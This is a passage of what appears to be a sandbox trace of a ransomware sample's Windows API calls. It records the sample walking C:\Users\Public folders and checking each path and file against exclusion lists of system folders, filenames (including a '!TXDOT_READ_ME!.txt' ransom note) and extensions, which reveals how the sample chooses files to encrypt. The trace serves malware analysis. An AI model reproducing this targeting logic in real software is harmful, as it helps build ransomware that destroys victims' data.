ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1930 [0119.944] StrCmpW (psz1=".", psz2=".") returned 0 [0119.944] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.944] StrCmpW (psz1="..", psz2=".") returned 1 [0119.944] StrCmpW (psz1="..", psz2="..") returned 0 [0119.944] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1 [0119.944] StrCmpW (psz1="AccountPictures", psz2=".") returned 1 [0119.944] StrCmpW (psz1="AccountPictures", psz2="..") returned 1 [0119.944] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.944] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0119.944] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="AccountPictures", cchMax=1056 | out: psz1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\system32\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\system\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\local\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\boot\\") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\perflogs\\") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\programdata\\") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\drivers\\") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\wsus\\") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="crypt_detect") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="cryptolocker") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="ransomware") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\WINDOWS") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.945] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\Program Files") returned 0x0 [0119.945] GetProcessHeap () returned 0xe30000 [0119.945] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xef3600 [0119.945] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\AccountPictures", cchMax=1088 | out: psz1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0119.945] StrNCatW (in: psz1="C:\\Users\\Public\\AccountPictures", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\Public\\AccountPictures\\*") returned="C:\\Users\\Public\\AccountPictures\\*" [0119.945] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b70 [0119.945] StrCmpW (psz1=".", psz2=".") returned 0 [0119.945] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.945] StrCmpW (psz1="..", psz2=".") returned 1 [0119.945] StrCmpW (psz1="..", psz2="..") returned 0 [0119.945] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.945] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.945] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.945] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.945] FindClose (in: hFindFile=0xec1b70 | out: hFindFile=0xec1b70) returned 1 [0119.946] GetProcessHeap () returned 0xe30000 [0119.946] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.946] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0119.946] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0119.946] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0119.946] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.946] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0119.946] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Desktop", cchMax=1056 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="crypt_detect") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="cryptolocker") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="ransomware") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.946] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0119.946] GetProcessHeap () returned 0xe30000 [0119.946] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xef3600 [0119.946] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0119.946] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\*") returned="C:\\Users\\Public\\Desktop\\*" [0119.947] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1e30 [0119.947] StrCmpW (psz1=".", psz2=".") returned 0 [0119.947] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.947] StrCmpW (psz1="..", psz2=".") returned 1 [0119.947] StrCmpW (psz1="..", psz2="..") returned 0 [0119.947] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38bb5c78, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x38bb5c78, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x852, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Acrobat Reader DC.lnk", cAlternateFileName="ACROBA~1.LNK")) returned 1 [0119.947] StrCmpW (psz1="Acrobat Reader DC.lnk", psz2=".") returned 1 [0119.947] StrCmpW (psz1="Acrobat Reader DC.lnk", psz2="..") returned 1 [0119.947] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0119.947] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0119.947] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Acrobat Reader DC.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" [0119.947] PathFindExtensionW (pszPath="Acrobat Reader DC.lnk") returned=".lnk" [0119.947] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="bootsect.bak") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="iconcache.db") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="thumbs.db") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2=" ransomware ") returned 1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2=" ransom ") returned 1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="debug.txt") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="boot.ini") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="desktop.ini") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="autorun.inf") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntuser.dat") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntldr") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntdetect.com") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="bootfont.bin") returned -1 [0119.947] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0119.947] PathFindExtensionW (pszPath="Acrobat Reader DC.lnk") returned=".lnk" [0119.947] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0119.947] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.947] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.948] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.948] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x91a, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0119.948] StrCmpW (psz1="Google Chrome.lnk", psz2=".") returned 1 [0119.948] StrCmpW (psz1="Google Chrome.lnk", psz2="..") returned 1 [0119.948] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0119.948] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0119.948] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Google Chrome.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" [0119.948] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0119.948] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="bootsect.bak") returned 1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="iconcache.db") returned -1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="thumbs.db") returned -1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2=" ransomware ") returned 1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2=" ransom ") returned 1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="debug.txt") returned 1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="boot.ini") returned 1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="desktop.ini") returned 1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="autorun.inf") returned 1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntuser.dat") returned -1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntldr") returned -1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntdetect.com") returned -1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="bootfont.bin") returned 1 [0119.948] StrCmpIW (psz1="Google Chrome.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0119.948] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0119.948] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0119.948] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0119.948] StrCmpW (psz1="Mozilla Firefox.lnk", psz2=".") returned 1 [0119.948] StrCmpW (psz1="Mozilla Firefox.lnk", psz2="..") returned 1 [0119.948] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0119.948] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0119.948] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Mozilla Firefox.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0119.948] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0119.948] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0119.948] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="bootsect.bak") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="iconcache.db") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="thumbs.db") returned -1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2=" ransomware ") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2=" ransom ") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="debug.txt") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="boot.ini") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="desktop.ini") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="autorun.inf") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntuser.dat") returned -1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntldr") returned -1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntdetect.com") returned -1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="bootfont.bin") returned 1 [0119.949] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0119.949] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0119.949] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0119.949] FindNextFileW (in: hFindFile=0xec1e30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0119.949] FindClose (in: hFindFile=0xec1e30 | out: hFindFile=0xec1e30) returned 1 [0119.949] GetProcessHeap () returned 0xe30000 [0119.949] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.949] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.949] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.949] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.949] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0119.949] StrCmpW (psz1="Documents", psz2=".") returned 1 [0119.949] StrCmpW (psz1="Documents", psz2="..") returned 1 [0119.949] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.949] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0119.949] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Documents", cchMax=1056 | out: psz1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0119.949] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0119.949] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.949] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0119.949] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", 